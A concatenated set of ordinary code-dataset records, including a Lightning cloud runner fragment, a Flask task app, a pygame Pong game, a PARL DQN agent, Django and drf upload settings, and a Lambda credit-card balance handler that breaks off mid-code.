Body8(\n app_entrypoint_file=app_spec.app_entrypoint_file,\n enable_app_server=app_spec.enable_app_server,\n flow_servers=app_spec.flow_servers,\n image_spec=app_spec.image_spec,\n cluster_id=cluster_id,\n works=[V1Work(name=work_req.name, spec=work_req.spec) for work_req in work_reqs],\n local_source=True,\n dependency_cache_key=app_spec.dependency_cache_key,\n )\n if cluster_id is not None:\n self._ensure_cluster_project_binding(project.project_id, cluster_id)\n\n lightning_app_release = self.backend.client.lightningapp_v2_service_create_lightningapp_release(\n project.project_id, lightning_app.id, release_body\n )\n\n if cluster_id is not None:\n logger.info(f\"running app on {lightning_app_release.cluster_id}\")\n\n if lightning_app_release.source_upload_url == \"\":\n raise RuntimeError(\"The source upload url is empty.\")\n\n repo.package()\n repo.upload(url=lightning_app_release.source_upload_url)\n\n # right now we only allow a single instance of the 
app\n find_instances_resp = self.backend.client.lightningapp_instance_service_list_lightningapp_instances(\n project.project_id, app_id=lightning_app.id\n )\n if find_instances_resp.lightningapps:\n existing_instance = find_instances_resp.lightningapps[0]\n if existing_instance.status.phase != V1LightningappInstanceState.STOPPED:\n # TODO(yurij): Implement release switching in the UI and remove this\n # We can only switch release of the stopped instance\n existing_instance = self.backend.client.lightningapp_instance_service_update_lightningapp_instance(\n project_id=project.project_id,\n id=existing_instance.id,\n body=Body3(spec=V1LightningappInstanceSpec(desired_state=V1LightningappInstanceState.STOPPED)),\n )\n # wait for the instance to stop for up to 150 seconds\n for _ in range(150):\n existing_instance = self.backend.client.lightningapp_instance_service_get_lightningapp_instance(\n project_id=project.project_id, id=existing_instance.id\n )\n if existing_instance.status.phase == V1LightningappInstanceState.STOPPED:\n break\n time.sleep(1)\n if existing_instance.status.phase != V1LightningappInstanceState.STOPPED:\n raise RuntimeError(\"Failed to stop the existing instance.\")\n\n lightning_app_instance = (\n self.backend.client.lightningapp_instance_service_update_lightningapp_instance_release(\n project_id=project.project_id,\n id=existing_instance.id,\n body=Body4(release_id=lightning_app_release.id),\n )\n )\n\n self.backend.client.lightningapp_instance_service_update_lightningapp_instance(\n project_id=project.project_id,\n id=existing_instance.id,\n body=Body3(\n spec=V1LightningappInstanceSpec(\n desired_state=V1LightningappInstanceState.RUNNING, env=v1_env_vars\n )\n ),\n )\n else:\n lightning_app_instance = (\n self.backend.client.lightningapp_v2_service_create_lightningapp_release_instance(\n project.project_id,\n lightning_app.id,\n lightning_app_release.id,\n Body9(\n cluster_id=cluster_id,\n desired_state=V1LightningappInstanceState.RUNNING,\n name=lightning_app.name,\n env=v1_env_vars,\n ),\n )\n )\n except ApiException as e:\n logger.error(e.body)\n sys.exit(1)\n\n if on_before_run:\n on_before_run(lightning_app_instance)\n\n if lightning_app_instance.status.phase == V1LightningappInstanceState.FAILED:\n raise RuntimeError(\"Failed to create the application. 
Cannot upload the source code.\")\n\n if cleanup_handle:\n cleanup_handle()\n\n def _ensure_cluster_project_binding(self, project_id: str, cluster_id: str):\n cluster_bindings = self.backend.client.projects_service_list_project_cluster_bindings(project_id=project_id)\n\n for cluster_binding in cluster_bindings.clusters:\n if cluster_binding.cluster_id != cluster_id:\n continue\n if cluster_binding.project_id == project_id:\n return\n\n self.backend.client.projects_service_create_project_cluster_binding(\n project_id,\n body=V1ProjectClusterBinding(cluster_id=cluster_id, project_id=project_id),\n )\n\n @staticmethod\n def _check_uploaded_folder(root: Path, repo: LocalSourceCodeDir) -> None:\n \"\"\"This method is used to inform the users if their folder files are large and how to filter them.\"\"\"\n lightning_tar = set(fnmatch.filter(repo.files, \"*lightning-*.tar.gz\"))\n app_folder_size = sum(Path(p).stat().st_size for p in repo.files if p not in lightning_tar)\n app_folder_size_in_mb = round(app_folder_size / (1000 * 1000), 5)\n if app_folder_size_in_mb > CLOUD_UPLOAD_WARNING:\n path_sizes = [(p, Path(p).stat().st_size / (1000 * 1000)) for p in repo.files]\n largest_paths = sorted((x for x in path_sizes if x[-1] > 0.01), key=lambda x: x[1], reverse=True)[:25]\n largest_paths_msg = \"\\n\".join(f\"{round(s, 5)} MB: {p}\" for p, s in largest_paths)\n warning_msg = (\n f\"Your application folder {root} is more than {CLOUD_UPLOAD_WARNING} MB. \"\n f\"Found {app_folder_size_in_mb} MB \\n\"\n \"Here are the largest files: \\n\"\n f\"{largest_paths_msg}\"\n )\n if not os.path.exists(os.path.join(root, \".lightningignore\")):\n warning_msg = (\n warning_msg\n + \"\\nIn order to ignore some files or folder, \"\n + \"create a `.lightningignore` file and add the paths to ignore.\"\n )\n else:\n warning_msg += \"\\nYou can ignore some files or folders by adding them to `.lightningignore`.\"\n logger.warning(warning_msg)\n","sub_path":"src/lightning_app/runners/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":15587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"229983309","text":"# -*- coding: utf-8 -*-\n\"\"\"Demo story.\n\"\"\"\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nsys.path.append('storybuilder')\nfrom storybuilder.builder.world import World\nfrom storybuilder.builder.writer import Writer\n\nW = Writer\n\n## scenes\ndef sc_whiteblack(w: World):\n aka, kuro = W(w.akane), W(w.kuro)\n return w.scene(\"白と黒だけ\", \"彼女は色を捨てて白と黒だけで彼を描いた\",\n aka.talk(\"なんで?\"),\n aka.look(\"買ってきたチキンを\"),\n kuro.talk(\"クリスマスで安く売ってたからさ\"),\n kuro.look(\"彼女の不機嫌な顔を\"),\n kuro.remember(\"クリスマスが嫌いだと\"),\n kuro.talk(\"別に祝おうってんじゃないから良いだろ\"),\n aka.talk(\"これ\"),\n aka.look(doing=\"キャンバスを見せる\"),\n kuro.look(doing=\"そこには白と黒で描かれた彼の顔がある\"),\n kuro.talk(\"何だよ\"),\n aka.talk(\"クリスマスだからね\"),\n aka.do(\"珍しく微笑\"),\n kuro.talk(\"そっか。あんがと\"),\n kuro.talk(\"これが、お前の世界なのか?\"),\n aka.talk(\"わかんないよ。色はさ。けど、形は触ったから\"),\n kuro.do(\"キスしてやる\"),\n aka.talk(\"クリスマスだからとかって言い訳は必要?\"),\n kuro.talk(\"ただのありががとうだよ\"),\n aka.do(\"嬉しそうにチキンにかじりついた\"),\n )\n\n## episode\ndef ep_demo(w: World):\n return w.episode(\"Demo\", \"モノクロな世界で\",\n sc_whiteblack(w),\n )\n","sub_path":"monochrome/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"504760215","text":"import requests\nimport os,sys\nimport time\nfrom api import 
apiweb\n\nu='\\033[4m'\nw='\\033[00m'\nr='\\033[91m'\nb='\\033[34m'\ny='\\033[33m'\ng='\\033[32m'\n\ndef menu():\n    try:\n        print (w)\n        main()\n    except KeyboardInterrupt:\n        sys.exit(0)\n\ndef main():\n    target = str(input(w+\"[ Web Target ]=> \"))\n    print (\"\")\n    print (b+'[+]'+w+' Scanning ip location for '+target)\n    time.sleep(5)\n    x = apiweb.apiweb(9, target)\n    print (\"\")\n    print (w+\"=================================================\")\n    print (g,x)\n    print (w+\"=================================================\")\n    print (\"\")\n    print (b+'[+]'+w+' Done')\n    print (\"\")\n    # the original branched on the typed value but exited either way,\n    # so just wait for enter and exit\n    input(w+\"[ enter ]\")\n    sys.exit(0)\n\nmenu()","sub_path":"modules/webtoolkit/iploclookup.py","file_name":"iploclookup.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"238612726","text":"import time # Used to get timestamps\nfrom datetime import datetime # Used to get the current date\n\n# import flask modules\nfrom flask import render_template, flash, session, redirect, url_for\n\n# import from the self-written package 'app'\nfrom app import app, db, moment, admin\nfrom flask_admin.contrib.sqla import ModelView\n\n# import the classes from models and forms\nfrom .models import Task\nfrom .forms import taskForm, editForm, searchForm\n\nadmin.add_view(ModelView(Task, db.session))\n\n@app.route('/', methods=['GET'])\ndef root():\n    return render_template(\"welcome.html\", title=\"Welcome\",\n                           current_time=datetime.utcnow())\n\n@app.route('/view_task', methods=['GET'])\ndef view_task():\n    tasks = Task.query.order_by(Task.taskDate).all()\n    return render_template(\"view_task.html\", title=\"View Task\",\n                           current_time=datetime.utcnow(), tasks=tasks)\n\n# the route converter below (and the <int:tid> ones further down) were\n# stripped by the HTML extraction and are restored here\n@app.route('/view_task/<kind_s>', methods=['GET'])\ndef view_task_category(kind_s):\n    # Dict to map the input (from GET) to the database columns\n    kind_dict = {'name': Task.taskName,\n                 'category': Task.taskKind,\n                 'status': Task.taskStatus}\n    kind = kind_dict.get(kind_s, None)\n    # With invalid input from GET\n    if not kind:\n        return render_template('404.html', title=\"Page Not Found\",\n                               current_time=datetime.utcnow()), 404\n    # Get the row (object) query from the database\n    tasks = Task.query.order_by(kind).all()\n    return render_template(\"view_task.html\", title=\"View Task\",\n                           current_time=datetime.utcnow(), tasks=tasks)\n\n@app.route('/create_task', methods=['GET', 'POST'])\ndef create_task():\n    # Get data from session (store the data before redirect)\n    status = session.get('con')\n    if status:\n        session.pop('con') # Clear the session flag\n    form = taskForm() # Create the form instance\n    if form.errors:\n        flash('Errors=\"%s\"' % (form.errors))\n    # if the submitted form is valid, store it in the database\n    if form.validate_on_submit():\n        session['con'] = True # remember the successful submit across the redirect\n        tid = int(time.time()) # Get timestamp as task ID\n        # Create the database row object\n        t = Task(taskId=tid, taskName=form.task_name.data,\n                 taskStatus=False, taskDate=form.task_date.data,\n                 taskKind=form.task_kind.data, taskNotice=form.task_notice.data)\n        db.session.add(t)\n        db.session.commit()\n        return redirect(url_for('create_task'))\n    return render_template(\"create_task.html\", title=\"Create Task\",\n                           current_time=datetime.utcnow(),\n                           form = form,\n                           status = status)\n\n@app.route('/search_task', methods=['GET', 'POST'])\ndef search_task():\n    form = searchForm()\n    if form.errors:\n        flash('Errors=\"%s\"' % (form.errors))\n    if form.validate_on_submit():
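\n        # build the result set by intersecting the optional name filter with\n        # the status and kind filters below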
\n        if form.task_name.data:\n            tasks = Task.query.filter_by(taskName=form.task_name.data).all()\n        else:\n            tasks = Task.query.all()\n        task0 = Task.query.filter_by(taskStatus=form.task_status.data).all()\n        tasks = list(set(tasks).intersection(set(task0)))\n        if form.task_kind.data:\n            task1 = Task.query.filter_by(taskKind=form.task_kind.data).all()\n            tasks = list(set(tasks).intersection(set(task1)))\n        return render_template(\"search_result.html\", title='Search Result',\n                               current_time=datetime.utcnow(),\n                               tasks = tasks)\n    return render_template(\"search_task.html\", title=\"Search Task\",\n                           current_time=datetime.utcnow(),\n                           form = form)\n\n@app.route('/edit_task/<int:tid>', methods=['GET', 'POST'])\ndef edit_task(tid):\n    task = Task.query.get(tid)\n    form = editForm()\n    if form.errors:\n        flash('Errors=\"%s\"' % (form.errors))\n    if form.validate_on_submit():\n        t = task\n        t.taskName = form.task_name.data\n        t.taskDate = form.task_date.data\n        t.taskKind = form.task_kind.data\n        t.taskStatus = form.task_status.data\n        t.taskNotice = form.task_notice.data\n        db.session.commit()\n        return redirect(url_for('view_task'))\n    return render_template(\"edit_task.html\", title=\"Edit Task\",\n                           current_time=datetime.utcnow(),\n                           task = task,\n                           form = form)\n\n@app.route('/delete_task/<int:tid>', methods=['GET'])\ndef delete_task(tid):\n    task = Task.query.get(tid)\n    db.session.delete(task)\n    db.session.commit()\n    return redirect(url_for('view_task'))\n\n@app.route('/finish_task/<int:tid>', methods=['GET'])\ndef finish_task(tid):\n    task = Task.query.get(tid)\n    task.taskStatus = True\n    db.session.commit()\n    return redirect(url_for('view_task'))\n@app.route('/unfinish_task/<int:tid>', methods=['GET'])\ndef unfinish_task(tid):\n    task = Task.query.get(tid)\n    task.taskStatus = False\n    db.session.commit()\n    return redirect(url_for('view_task'))\n\n@app.route('/finish_inSearch/<int:tid>', methods=['GET'])\ndef finish_inSearch(tid):\n    task = Task.query.get(tid)\n    task.taskStatus = True\n    db.session.commit()\n    return redirect(url_for('search_task'))\n@app.route('/unfinish_inSearch/<int:tid>', methods=['GET'])\ndef unfinish_inSearch(tid):\n    task = Task.query.get(tid)\n    task.taskStatus = False\n    db.session.commit()\n    return redirect(url_for('search_task'))\n\n\n# Register the error handlers\n@app.errorhandler(404)\ndef page_not_found(e):\n    return render_template('404.html', title=\"Page Not Found\",\n                           current_time=datetime.utcnow()), 404\n@app.errorhandler(500)\ndef internal_server_error(e):\n    return render_template('500.html', title=\"Internal Server Error\",\n                           current_time=datetime.utcnow()), 500\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"429954503","text":"import pygame\r\npygame.init()\r\nscreen = pygame.display.set_mode([640,480])\r\nbackground = pygame.Surface(screen.get_size())\r\npygame.display.set_caption('PingPong')\r\n\r\nclass Ball(pygame.sprite.Sprite):
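\r\n    # the ball bounces off the top/bottom edges and off the paddles in 'group';\r\n    # the shared 'difficult' counter speeds it up after every paddle hit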
\r\n    def __init__(self, x_speed, y_speed):\r\n        pygame.sprite.Sprite.__init__(self)\r\n        self.x_speed = x_speed\r\n        self.y_speed = y_speed\r\n        self.stop = False\r\n        self.image = pygame.Surface([20, 20], pygame.SRCALPHA)\r\n        self.rect = self.image.get_rect()\r\n        self.rect.left = screen.get_width()/2 - self.image.get_width()/2\r\n        self.rect.top = screen.get_height()/2 - self.image.get_height()/2\r\n        pygame.draw.circle(self.image, [0, 0, 0], [10, 10], 10)\r\n        group.add(self)\r\n\r\n    def game(self):\r\n        global difficult\r\n\r\n        if self.rect.top < 0 or self.rect.top > 470:\r\n            self.y_speed *= -1\r\n            self.rect.top += self.y_speed + self.y_speed * difficult / 25\r\n\r\n        group.remove(self)\r\n\r\n        if pygame.sprite.spritecollide(self, group, False):\r\n            difficult += 3\r\n            self.x_speed *= -1\r\n            self.rect.left += self.x_speed + self.x_speed * difficult / 50\r\n        group.add(self)\r\n\r\n        self.rect.left = self.rect.left + self.x_speed + self.x_speed * difficult / 40\r\n        self.rect.top = self.rect.top + self.y_speed + self.y_speed * difficult / 20\r\n\r\n\r\n    def wait(self):\r\n        global wait, your_score, my_score, colised_right, colised_left, difficult\r\n\r\n        if colised_left:\r\n            your_score = your_score + 1\r\n            self.rect.left, self.rect.top = ([screen.get_width() / 2 - ball.image.get_width() / 2 \\\r\n                , screen.get_height() / 2 - ball.image.get_height() / 2])\r\n            difficult = 1\r\n\r\n        if colised_right:\r\n            my_score = my_score + 1\r\n            self.rect.left, self.rect.top = ([screen.get_width() / 2 - ball.image.get_width() / 2 \\\r\n                , screen.get_height() / 2 - ball.image.get_height() / 2])\r\n            difficult = 1\r\n\r\n        if colised_left or colised_right:\r\n            self.stop = True\r\n\r\n        if self.stop and wait < 100:\r\n            wait = wait + 1\r\n        else:\r\n            wait = 0\r\n            self.stop = False\r\n\r\nclass Paddle(pygame.sprite.Sprite):\r\n    def __init__(self, position):\r\n        pygame.sprite.Sprite.__init__(self)\r\n        self.image = pygame.Surface([8, 100])\r\n        self.image.fill([0,0,0])\r\n        self.rect = self.image.get_rect()\r\n        self.rect.left, self.rect.top = (position)\r\n        group.add(self)\r\n\r\nif __name__ == '__main__':\r\n    difficult = 1\r\n    colised_left = False\r\n    colised_right = False\r\n    group = pygame.sprite.Group()\r\n    FPS = pygame.time.Clock()\r\n    pygame.key.set_repeat(1, 1)\r\n    wait = 0\r\n    myPaddle = Paddle([10,190])\r\n    my_score = 0\r\n    yourPaddle = Paddle([620,190])\r\n    your_score = 0\r\n    ball = Ball(5,1)\r\n    ball.stop = False\r\n    score_font = pygame.font.Font(None,50)\r\n    score_surface = score_font.render(str(my_score) + \" \" + str(your_score),1,(0,0,0))\r\n    score_position = [screen.get_width()/2 - score_surface.get_width()/2,20]\r\n    launched = True\r\n\r\n    while launched:\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                launched = False\r\n            elif event.type == pygame.KEYDOWN:\r\n                if event.key == pygame.K_UP and yourPaddle.rect.top >= 0:\r\n                    yourPaddle.rect.top = yourPaddle.rect.top - 8\r\n                if event.key == pygame.K_DOWN and yourPaddle.rect.top <= 380:\r\n                    yourPaddle.rect.top = yourPaddle.rect.top + 8\r\n                if event.key == pygame.K_w and myPaddle.rect.top >= 0:\r\n                    myPaddle.rect.top = myPaddle.rect.top - 8\r\n                if event.key == pygame.K_s and myPaddle.rect.top <= 380:\r\n                    myPaddle.rect.top = myPaddle.rect.top + 8\r\n\r\n        if ball.rect.left < 0:\r\n            colised_left = True\r\n\r\n        if ball.rect.left > 630:\r\n            colised_right = True\r\n\r\n        FPS.tick(100)\r\n        background.fill([0, 255, 255])\r\n        background.blit(yourPaddle.image, yourPaddle.rect)\r\n        background.blit(myPaddle.image, myPaddle.rect)
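\r\n        # each frame is composed on the off-screen 'background' surface and\r\n        # copied to the display once, right before flip() at the end of the loop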
background.blit(ball.image, ball.rect)\r\n ball.wait()\r\n\r\n if wait == 0:\r\n ball.game()\r\n\r\n colised_left = False\r\n colised_right = False\r\n score_surface = score_font.render(str(my_score)+\" \"+str(your_score),1,(0,0,0))\r\n background.blit(score_surface,score_position)\r\n pygame.display.flip()","sub_path":"game1.4.py","file_name":"game1.4.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"189989999","text":"def countones(st):\r\n dc = {}\r\n for i in st:\r\n if i in dc:\r\n dc[i] += 1\r\n else:\r\n dc[i] = 1\r\n c = 0\r\n for i in dc.values():\r\n if i % 2 != 0:\r\n c += 1\r\n return max(0, c-1)\r\nprint(countones(input()))","sub_path":"peragrams.py","file_name":"peragrams.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"647710879","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n#-*- coding: utf-8 -*-\n\nimport parl\nimport paddle\nimport numpy as np\n\n\nclass Agent(parl.Agent):\n def __init__(self, algorithm, act_dim, e_greed=0.1, e_greed_decrement=0):\n super(Agent, self).__init__(algorithm)\n assert isinstance(act_dim, int)\n self.act_dim = act_dim\n\n self.global_step = 0\n self.update_target_steps = 200 # copy the model parameters to target_model every 200 training steps\n\n self.e_greed = e_greed # probability of picking a random action, i.e. exploration\n self.e_greed_decrement = e_greed_decrement # gradually reduce exploration as training converges\n\n def sample(self, obs):\n \"\"\" Sample an action (with exploration) from the observation obs\n \"\"\"\n sample = np.random.random() # random float between 0 and 1\n if sample < self.e_greed:\n act = np.random.randint(self.act_dim) # explore: every action has a chance to be picked\n else:\n act = self.predict(obs) # exploit: choose the best action\n self.e_greed = max(\n 0.01, self.e_greed - self.e_greed_decrement) # gradually reduce exploration as training converges\n return act\n\n def predict(self, obs):\n \"\"\" Choose the best action from the observation obs\n \"\"\"\n obs = paddle.to_tensor(obs, dtype='float32')\n pred_q = self.alg.predict(obs)\n act = int(pred_q.argmax()) # index of the largest Q value, i.e. the chosen action\n return act\n\n def learn(self, obs, act, reward, next_obs, terminal):\n \"\"\" Update the model parameters once with the training data\n \"\"\"\n if self.global_step % self.update_target_steps == 0:\n self.alg.sync_target()\n self.global_step += 1\n\n act = np.expand_dims(act, axis=-1)\n reward = np.expand_dims(reward, axis=-1)\n terminal = np.expand_dims(terminal, axis=-1)\n\n obs = paddle.to_tensor(obs, dtype='float32')\n act = paddle.to_tensor(act, dtype='int32')\n reward = paddle.to_tensor(reward, dtype='float32')\n next_obs = paddle.to_tensor(next_obs, dtype='float32')\n terminal = paddle.to_tensor(terminal, dtype='float32')\n loss = self.alg.learn(obs, act, reward, next_obs, terminal) # run one training step of the network\n return float(loss)\n","sub_path":"examples/tutorials/parl2_dygraph/lesson3/homework/dqn_mountaincar/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
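A minimal wiring sketch for the DQN Agent in the entry above. The MLP model, the environment choice, and the hyper-parameters below are illustrative assumptions rather than part of the dataset, and PARL/Paddle signatures may differ slightly between versions:

import gym
import parl
import paddle.nn as nn
import paddle.nn.functional as F
from parl.algorithms import DQN

class MLPModel(parl.Model):
    # Tiny Q-network; the 128-unit hidden layer is an arbitrary choice.
    def __init__(self, obs_dim, act_dim):
        super().__init__()
        self.fc1 = nn.Linear(obs_dim, 128)
        self.fc2 = nn.Linear(128, act_dim)

    def forward(self, obs):
        return self.fc2(F.relu(self.fc1(obs)))

env = gym.make('MountainCar-v0')
obs_dim = env.observation_space.shape[0]
act_dim = env.action_space.n

model = MLPModel(obs_dim, act_dim)
alg = DQN(model, gamma=0.99, lr=0.001)   # placeholder hyper-parameters
agent = Agent(alg, act_dim=act_dim,      # Agent is the class from the entry above
              e_greed=0.1, e_greed_decrement=1e-6)

obs = env.reset()
act = agent.sample(obs)                  # epsilon-greedy action during training
next_obs, reward, done, _ = env.step(act)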
+{"seq_id":"400525521","text":"from ckeditor.widgets import CKEditorWidget\nfrom ckeditor_uploader.widgets import CKEditorUploadingWidget\nfrom dal import autocomplete\nfrom django import forms\nfrom .models import Category, Tag, Post\n\nclass PostAdminForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n print('init',args, kwargs)\n if 'instance' in kwargs and kwargs['instance']:\n initial = {}\n instance = kwargs[\"instance\"]\n if instance.is_md:\n initial['content_md'] = instance.content\n else:\n initial['content_ck'] = instance.content\n kwargs.update({'initial':initial})\n super().__init__(*args,**kwargs)\n\n desc = forms.CharField(widget=forms.Textarea, label=\"摘要\", required=False)\n category = forms.ModelChoiceField(\n queryset = Category.objects.all(),\n widget = autocomplete.ModelSelect2(url='category_autocomplete'),\n label=\"分类\",\n )\n tag = forms.ModelMultipleChoiceField(\n queryset = Tag.objects.all(),\n widget = autocomplete.ModelSelect2Multiple(url='tag_autocomplete'),\n label=\"标签\",\n )\n content = forms.CharField(widget = forms.HiddenInput(), label=\"正文\", required=False)\n content_ck = forms.CharField(widget = CKEditorUploadingWidget(), label=\"正文\", required=False)\n content_md = forms.CharField(widget = forms.Textarea(), label=\"正文\", required=False)\n \n class Meta:\n model = Post\n fields = (\n 'category',\n 'tag','title',\n 'desc','is_md',\n 'content','content_ck','content_md',\n 'status')\n \n def save(self, commit=True):\n instance = super().save(commit=False)\n instance.content = self.cleaned_data['content']\n instance.save()\n return instance\n\n def clean(self):\n is_md = self.cleaned_data.get('is_md')\n if is_md:\n content_field_name = 'content_md'\n else:\n content_field_name = 'content_ck'\n content = self.cleaned_data.get(content_field_name)\n if not content:\n self.add_error(content_field_name,'必填内容')\n return\n self.cleaned_data['content']= content\n print(self.cleaned_data)\n return super().clean()","sub_path":"typeit/blog/admin_form.py","file_name":"admin_form.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"250946924","text":"# label.pbtxt -> labels.txt\n\nimport re\n\nlabels = open(\"labels.txt\", \"wb\")\nlabel_pb = open(\"label.pbtxt\", \"r\")\n\nbuff = label_pb.read() # re cannot input direct from open operation.\n\nstr_ids = re.findall('id: (.*?)\\n', buff, re.S) # find all ids.\nstr_labels = re.findall('display_name: \"(.*?)\"', buff, re.S) # find all lables.\n\nint_ids = map(eval, str_ids) # convert all strings to a inter list.\n\nlabel_list = ['NA' for x in range(0, max(int_ids))] # initialize a list with 'NA'\ni = 0\nfor each_id in str_ids:\n label_list[int(each_id) - 1] = str_labels[i];\n i += 1\n\nfor j in range(0, max(int_ids)):\n labels.write(label_list[j] + '\\n')\n\nlabels.close()\n","sub_path":"my/obj_detection/pb2txt.py","file_name":"pb2txt.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"52604504","text":"import os.path\nimport time\nfrom datetime import timedelta\n\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\n\n# How long after creation the upload will expire\nDEFAULT_EXPIRATION_DELTA = timedelta(days=1)\nEXPIRATION_DELTA = getattr(\n settings, \"DRF_CHUNKED_UPLOAD_EXPIRATION_DELTA\", DEFAULT_EXPIRATION_DELTA\n)\n\n# Path where uploading files will be stored until 
completion\nDEFAULT_UPLOAD_PATH = \"chunked_uploads/%Y/%m/%d\"\nUPLOAD_PATH = getattr(settings, \"DRF_CHUNKED_UPLOAD_PATH\", DEFAULT_UPLOAD_PATH)\n\n# File extensions for upload files\nINCOMPLETE_EXT = getattr(settings, \"DRF_CHUNKED_UPLOAD_INCOMPLETE_EXT\", \".part\")\n\n# upload_to function to be used in the FileField\ndef default_upload_to(instance, filename):\n filename = os.path.join(UPLOAD_PATH, str(instance.id) + INCOMPLETE_EXT)\n return time.strftime(filename)\n\n\nUPLOAD_TO = getattr(settings, \"DRF_CHUNKED_UPLOAD_TO\", default_upload_to)\n\n# Checksum type to use when verifying files\nDEFAULT_CHECKSUM_TYPE = \"md5\"\nCHECKSUM_TYPE = getattr(settings, \"DRF_CHUNKED_UPLOAD_CHECKSUM\", DEFAULT_CHECKSUM_TYPE)\n\n# Storage system\ntry:\n STORAGE = getattr(settings, \"DRF_CHUNKED_UPLOAD_STORAGE_CLASS\", lambda: None)()\nexcept TypeError:\n STORAGE = import_string(\n getattr(settings, \"DRF_CHUNKED_UPLOAD_STORAGE_CLASS\", lambda: None)\n )()\n\n# Boolean that defines if users beside the creator can access an upload record\nUSER_RESTRICTED = getattr(settings, \"DRF_CHUNKED_UPLOAD_USER_RESTRICED\", True)\n\n# Max amount of data (in bytes) that can be uploaded. `None` means no limit\nDEFAULT_MAX_BYTES = None\nMAX_BYTES = getattr(settings, \"DRF_CHUNKED_UPLOAD_MAX_BYTES\", DEFAULT_MAX_BYTES)\n\n# determine the \"null\" and \"blank\" properties of \"user\" field in the \"ChunkedUpload\" model\nDEFAULT_MODEL_USER_FIELD_NULL = getattr(\n settings, \"CHUNKED_UPLOAD_MODEL_USER_FIELD_NULL\", True\n)\nDEFAULT_MODEL_USER_FIELD_BLANK = getattr(\n settings, \"CHUNKED_UPLOAD_MODEL_USER_FIELD_BLANK\", True\n)\n\n# Upload URL\nNAMED_URL = getattr(settings, \"DRF_CHUNKED_UPLOAD_NAMED_URL\", \"chunkedupload-detail\")\n","sub_path":"drf_chunked_upload/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"153932838","text":"#import the Python packages for Lambda to use\r\nimport boto3\r\nfrom boto3.dynamodb.conditions import Key, Attr\r\nimport json\r\nimport decimal\r\nimport datetime\r\nfrom datetime import datetime, timedelta\r\n\r\n#start our Lambda runtime here \r\ndef lambda_handler(event_data, lambda_config):\r\n\r\n #Retrieve ANI from inbound callerID\r\n \r\n # unhide the below code line when using the test script\r\n callerId = event_data[\"sessionAttributes\"][\"CustomerNumber\"]\r\n \r\n # unhide the below code line when NOT using the test script\r\n #callerId = \"+60176053920\"\r\n \r\n #Lex Intent name\r\n intent_name = event_data['currentIntent']['name']\r\n \r\n #Lex session attributes\r\n session_attributes = event_data['sessionAttributes']\r\n \r\n #Establish connection to dynamoDB and retrieve table\r\n dynamodb = boto3.resource('dynamodb')\r\n table = dynamodb.Table('RICHA_ASHISH_DEV')\r\n client = boto3.client('lex-models')\r\n \r\n #Establish connection to dynamoDB and retrieve table\r\n #sns_client = boto3.client('sns')\r\n \r\n #KeyConditionExpression looks for number that equals ANI of inbound call from a dynamoDB table and saves it to response\r\n response = table.query(\r\n KeyConditionExpression=Key('phone_number').eq(callerId)\r\n )\r\n \r\n #will always return list\r\n items = response.get('Items')\r\n \r\n # unhide the below code line when using the test script\r\n cust_acct_type = event_data[\"currentIntent\"][\"slots\"][\"creditCardType\"]\r\n \r\n # unhide the below code line when NOT using the test script\r\n #cust_acct_type = 
event_data[\"currentIntent\"][\"slots\"][\"ccType\"]\r\n \r\n #print(\"cust_acct_type # \", cust_acct_type)\r\n \r\n cred_1_due_amount = items[0].get('cc_1_due_amount')\r\n cred_1_due_amount = decimal.Decimal(cred_1_due_amount)\r\n acct_balance = cred_1_due_amount\r\n \r\n cred_1_due_date = items[0].get('cc_1_due_date')\r\n cred_1_due_date = decimal.Decimal(cred_1_due_date)\r\n \r\n cred_2_due_amount = items[0].get('cc_2_due_amount')\r\n cred_2_due_amount = decimal.Decimal(cred_2_due_amount)\r\n \r\n cred_2_due_date = items[0].get('cc_2_due_date')\r\n cred_2_due_date = decimal.Decimal(cred_2_due_date)\r\n \r\n \r\n # Calculate days left for credit card payment\r\n paymt_due_date = 8 # to test zero days for payment\r\n \r\n cc1_days_left = paymt_due_date - cred_1_due_date \r\n cc2_days_left = paymt_due_date - cred_2_due_date \r\n \r\n # Apparently, the datetime module is not present in AWS Lambda. To make it work, you'll need to zip the libraries and upload them to Lambda\r\n # dt = date.today() - timedelta(days_to_subtract)\r\n \r\n if not items:\r\n return {'acct_balance_1' : 0, \"acct_type\": \"not available\"}\r\n else:\r\n \r\n if(intent_name == \"checkCreditCardBal\"):\r\n \r\n if (cust_acct_type in (\"platinum\")):\r\n 